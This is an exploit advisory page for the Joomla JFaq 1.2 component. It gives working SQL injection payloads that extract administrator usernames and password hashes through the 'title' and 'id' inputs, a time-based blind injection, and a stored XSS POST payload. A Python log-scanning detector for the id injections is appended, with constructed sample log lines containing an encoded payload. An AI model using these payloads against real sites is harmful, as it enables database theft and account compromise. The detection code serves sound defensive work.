Joomla Component JFaq 1.2 Multiple Vulnerabilities

Vulnerability ID 1050511 Vulnerability type
Published 2010-07-01 Updated 2010-07-01
CVE ID CVE-2010-2514
CVE-2010-2515
CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2010070168
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit


# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5

"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where 
gid=25 limit 1), 1, 1, 1, 1, 1) -- '


id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF

?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 
from jos_users where gid=25 -- '


id Blind SQL injection
----------------------
requires: magic quotes OFF

?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '


Persistent XSS
--------------
requires: a method to manually POST to form

postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"

NOTE: cannot be manually input - editor script strips exploit
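
Detection example
-----------------
Added example, not part of the original advisory: a log check that flags com_jfaq requests to the two tasks listed above whose id is not a plain integer. It assumes combined-format access logs and that legitimate id values are non-negative integers; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate JFaq "id" is a plain non-negative integer.
VALID_ID = re.compile(r"\d+")
# Tasks the advisory names as taking an injectable "id".
TASKS = {"detail", "categ"}

def suspicious_jfaq_requests(log_lines):
    """Return (line_number, task, decoded_id) for each com_jfaq request
    to a listed task whose id is not a plain integer."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so encoded quotes are seen as quotes.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_jfaq" not in params.get("option", []):
            continue
        task = params.get("task", [""])[-1]
        if task not in TASKS:
            continue
        # Check every repeated id parameter, not only the last one.
        for value in params.get("id", []):
            if not VALID_ID.fullmatch(value):
                hits.append((number, task, value))
    return hits

# Constructed sample log lines (addresses from the documentation range).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jul/2010:10:00:00 +0000] "GET /index.php?option=com_jfaq&task=detail&id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jul/2010:10:00:04 +0000] "GET /index.php?option=com_jfaq&task=categ&id=-1%27%20union%20select%20benchmark(1000000,md5(5))%20--%20%27 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jul/2010:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=12-about HTTP/1.1" 200 9001',
    '203.0.113.9 - - [01/Jul/2010:10:00:12 +0000] "GET /index.php?option=com_jfaq&task=detail&id=3%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for hit in suspicious_jfaq_requests(SAMPLE_LOG):
        print(hit)
```

The persistent XSS case is sent as POST data, which access logs normally do not record, so this check covers only the two id injections.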